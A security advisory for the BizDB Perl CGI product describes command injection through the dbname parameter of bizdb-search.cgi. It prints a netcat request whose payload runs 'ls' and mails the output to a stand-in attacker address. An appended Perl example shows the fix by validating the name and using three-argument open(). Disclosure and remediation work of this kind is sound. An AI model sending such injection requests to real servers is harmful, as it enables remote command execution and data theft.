BizDB is a web database integration product using Perl CGI scripts. One of the scripts, bizdb-search.cgi, has an unchecked open() call and can therefore be made to execute commands at the privilege level of the webserver. Remote exploit included.
0231145f36e7ae2640f0dc97b6b4306c0261fc240d851610ac7e3925a5697f20
<html>
<body bgcolor="#000000" text="#CCCCCC">
<pre>BizDB is a web database integration product
using Perl CGI scripts. One of the scripts,
bizdb-search.cgi, passes a variable's
contents to an unchecked open() call and
can therefore be made to execute commands
at the privilege level of the webserver.
The variable is dbname, and if passed a
semicolon followed by shell commands they
will be executed. This cannot be exploited
from a browser, as the software checks for
a referrer field in the HTTP request. A
valid referrer field can however be created
and sent programmatically or via a network
utility like netcat.
Exploit:
netcat target 80
GET /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@attacker-host|&f6=^a.*&action=searchdbdisplay HTTP/1.0
Host: target
Referer: http://target/cgi-bin/bizdb1-search.cgi?bizdb-search
(empty line)
(End of Input)
</pre>
</html>
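The root cause described above, an open() call fed directly from the dbname parameter, is closed by validating the name against an allow-list and using Perl's three-argument open(). The following is an added example, not BizDB code and not part of the original advisory; the directory /var/lib/bizdb, the .db suffix and the function name open_db are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: hypothetical handler, not BizDB source code.
use strict;
use warnings;

# Assumed layout: one file per database under a fixed directory.
my $DB_DIR = '/var/lib/bizdb';

# Validate the CGI parameter, then open the file with an explicit mode.
# Returns (filehandle, undef) on success or (undef, reason) on refusal.
sub open_db {
    my ($dbname) = @_;

    # Allow-list: short names of letters, digits, '_' and '-' only.
    # \A and \z anchor the whole string, so "name\n" cannot slip past.
    return (undef, 'invalid dbname')
        unless defined $dbname && $dbname =~ /\A([A-Za-z0-9_-]{1,64})\z/;

    my $path = "$DB_DIR/$1.db";

    # Three-argument open: '<' fixes the mode, so the path is always a
    # file name. Two-argument open(FH, $string) would instead read a
    # leading or trailing '|' in $string as "run this as a command".
    open(my $fh, '<', $path) or return (undef, "cannot open database: $!");
    return ($fh, undef);
}

# Constructed inputs: a plain name, the dbname value from the request
# above (URL-decoded), a traversal attempt, and a trailing newline.
my @samples = (
    'customers',
    ';ls|mail attacker@attacker-host|',
    '../../etc/passwd',
    "customers\n",
);

for my $dbname (@samples) {
    my ($fh, $err) = open_db($dbname);
    (my $shown = $dbname) =~ s/\n/\\n/g;
    printf "%-36s %s\n", "'$shown'", $fh ? 'opened' : "refused: $err";
    close $fh if $fh;
}
```

Only the first sample passes validation; whether it then opens depends on the file existing under the assumed directory.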